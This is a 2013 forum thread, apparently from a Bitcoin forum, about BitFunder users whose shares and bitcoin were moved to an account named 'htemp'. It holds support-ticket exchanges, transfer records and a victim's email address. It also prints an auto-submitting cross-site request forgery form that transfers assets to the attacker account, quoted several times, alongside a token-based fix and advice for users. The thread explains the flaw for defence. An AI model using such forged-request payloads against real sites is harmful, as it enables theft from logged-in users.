BitFunder.com has been hacked and IT IS BitFunder's fault

[HorseRider]

A long time Avalon miner and a very trustworth Bitcoiner has emailed me the story. It is written in Chinese and I am translate it. I just post this letter here for dicussion.


My username on BITFUNER is lixiulai@sina.com , and the login password is different with my other account. ON 20th, June, I found that my 2,869 shares of G.SDICE and 9.99 BTC disappeared. I checked the records, I find that my Bitcoin was used to purchase G.SDICE first then all the G.SDICE shares was transferred to another account, “htemp”. I didn’t know that the shares on BITFUNDER could be transferred before. I write an email to BITFUNDER support and ask to freeze the htemp account, and my request was ignored. Then I kept emailing the manager of BITFUNDER, and I state that the share transfer function is very dangerous without the 2 factor authentication, and I ask them to pay back my loss. Surprisingly the very next day I found that BITFUNDER had forced the user to enable 2fa before transferring the shares, and a letter that their exchange has no fault and it is my own fault not to enable the 2 factor authentication.

Another BITFUNDER user, Miss Wang Qiaoqiao, became a victim of the “htemp” theft nearly the same time with me. Then I started to suspect that it is the BITFUNDER had been hacked so the htemp can steal two people at the same time.

That’s the summaries. Here is the records of emails between the BITFUNDER support and lixiulai @sina.com.

=============================

My Support Requests

--------------------------------------------------------------------------------
Creation Date Ticket ID Subject Status
2013-06-25 19:54:38 XSQ-194159 I want to know, who operate my account. Closed
2013-06-25 19:54:38 Posted By: Me

After my account stolen, only this reminder. Transfer of this function is too dangerous, if I'm not enable 2-factor, this function should not be used. I want to know, who operate my account.
2013-06-25 19:58:26 Posted By: Me

Error: Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.


Transfer Shares:

Error: Google 2-Factor MUST be enabled to transfer shares.
2013-06-25 20:02:50 Posted By: Me

Why my account stolen, your website just become so.
 
2013-06-26 17:57:50 Posted By: Support Staff

Transfer has been limited to 2-factor only support.

Our server was not hacked. Someone used your account that was stolen from somewhere else.

Not our fault.

We are sorry that it happened. We offered protection option to users. You did not use it.

Thank You,
BitFunder Support
 
2013-06-25 05:32:48 TYL-678016 I hope you can give me some compensation. Closed
2013-06-25 05:32:48 Posted By: Me

My account BTC being bought into the stock, being transferred away, I do not know your website has a stock transfer of this function, that my password theft case, also can present to www.weexchange.co, I hope you can give me some compensation.
2013-06-25 16:49:49 Posted By: Support Staff

Attention: You do not currently have google 2-Factor enabled. If your account is hacked then we have little proof that it was not you that made the transfer. Having 2-Factor will help ensure the protection of your assets. To enable 2-Factor click on Settings.

You do not and have not had 2-factor enabled. We have no way to verify that you were were actually hacked or are the hacker.

We cannot offer any sort of compensation for users who do not properly protect their accounts and passwords.
We have secured our site to the best of our ability, which was not hacked. Your account information was leaked or stolen and we provided the ability of protection beyond that with 2-factor and you chose not to enable it.

Thank You,

[1715602416]

1715602416

[1715602416]

1715602416

[1715602416]

1715602416

[1715602416]

1715602416

[HorseRider]

[HorseRider]

Records of Bitqiaoqiao@gmail.com:


 

2013-06-19 01:42:16 Send Transfer To: htemp
TAT.ASICMINER: 10 Share/s
2013-06-19 01:42:02 Send Transfer To: htemp
AMC: 5,617 Share/s
2013-06-19 01:41:50 Send Transfer To: htemp
G.ASICMINER-PT: 8 Share/s

[🏰 TradeFortress 🏰]

The problem was something like this on a random site you visited:

Code:

<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

[🏰 TradeFortress 🏰]

This is how BitFunder could have fixed it:

Code:

if(!isset($_SESSION['csrf']) && $_SESSION['csrf'] = hash("SHA256", $salt9 . uniqid()));

echo "<form action='transfer' method='post'>
<input type='hidden' name='csrf' value='{$_SESSION['csrf']}'>";

...

Yes, BitFunder's site was is still vulnerable.

[superduh]

These are serious flaws and need to be fixed on alllll sites

[🏰 TradeFortress 🏰]

These are serious flaws and need to be fixed on alllll sites

This isn't a 0day that was suddenly discovered. It doesn't need to be fixed on "allll" sites because most sites are not vulnerable in the first place:



Every single function on Inputs.io:

$("#turnonnotify").click(function(){
   $.post("ajax", {token: $.cookie("token"), action: "changenotify", email: "yes"});
   $(this).fadeOut(250).fadeIn(250).html("Turn off");
});

[pgbit]

Would the account hack described above have occurred if 2 factor auth was used?

[🏰 TradeFortress 🏰]

Not through share transfers, but through another method yes. 2FA doesn't help.

Would be fixed if Bitfunder implemented a csrf token.

[PurpleTentacle]

The problem was something like this on a random site you visited:

Code:

<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?

Yes, BitFunder's site was is still vulnerable.

If so, how can we protect ourselves?

[Rannasha]

The problem was something like this on a random site you visited:

Code:

<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?

Yes.

Yes, BitFunder's site was is still vulnerable.

If so, how can we protect ourselves?

Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

[PurpleTentacle]

Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.

[🏰 TradeFortress 🏰]

Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.

You need to log out.

[PurpleTentacle]

Unless you use a site that has protected itself from these type of attacks (like TradeFortress described), log out of the exchange website after you're done. Or use a different browser / virtual machine for the exchange website.

Ok, thanks. I always close any open tabs when I log in to exchanges.

You need to log out.

Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

[monsterer]

Yes, I do that. I close any tabs I have open, log in to bitfunder, log out after I'm done and then open any other sites I want to visit.

With the monumental security flaws demonstrated in this thread, I would personally:

* Get my bitcoins out
* Get out
* Never come back

The person who wrote that code has no business being in business.

Cheers, Paul.

[TsuyokuNaritai]

Are you protected if you use BitFunder in a different browser?

[Deprived]

Are you protected if you use BitFunder in a different browser?

Against the easiest ways to attack yes - but I wouldn't recommend thinking of it as 100% safe.

[nubbins]

Yipes! As someone who has worked in web development for several years, this is SHOCKING.

I created an account a while ago, but never deposited any BTC because I didn't want to use WeExchange. Now I'm glad that I never!

[🏰 TradeFortress 🏰]

The easiest way to protect yourself would be using web applications that are coded securely. Now I'm not sure if btct.co uses an anti csrf token (I don't think it does?), but their PIN / 2 FA system makes this attack less useful (an attacker can just use JS to submit ~100 most common PINs)

[joele]

The problem was something like this on a random site you visited:

Code:

<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Yes, this code will work if you

The problem was something like this on a random site you visited:

Code:

<form id="csrf" action="https://bitfunder.com/transfer" method="post">
    <input type="hidden" name="asset" value="g.sdpt">
    <input type="hidden" name="amount" value="100">
    <input type="hidden" name="to_name" value="htemp">
</form>

<script>$("#csrf").submit()</script>

Bye bye assets.

Does this mean that he visited a site with the above code while he was logged in to bitfunder?

Yes, BitFunder's site was is still vulnerable.

If so, how can we protect ourselves?

Enable your 2fa, this code will not work if you enable your 2fa, because once you enabled your 2fa it need the 2fa field with correct value to complete the transfer.